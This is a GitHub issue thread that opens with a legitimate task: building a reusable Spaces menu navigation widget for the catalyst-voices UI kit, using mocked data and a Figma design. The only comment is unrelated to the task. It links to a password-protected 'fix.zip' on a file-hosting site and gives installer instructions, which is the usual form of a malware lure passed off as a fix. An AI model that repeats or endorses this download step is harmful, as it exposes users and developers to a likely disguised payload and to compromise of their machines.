### ISSUE TITLE
🛠️ [TASK] : Full Spaces menu navigation

### ISSUE THREAD

**Issue by damian-molinski** [input-output-hk/catalyst-voices#715]
### Summary

UI Kit components: Full Spaces menu navigation

### Description

Development of reusable widget:

- This task does not include GoRouter integration.
- Data is mocked here for now.
- Design can be found here [Figma](https://www.figma.com/design/80aDAQgoD0v06DO2Sb76ok/Catalyst--MVE(Post-MVP)?node-id=3203-146785&m=dev).

Part of #726

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
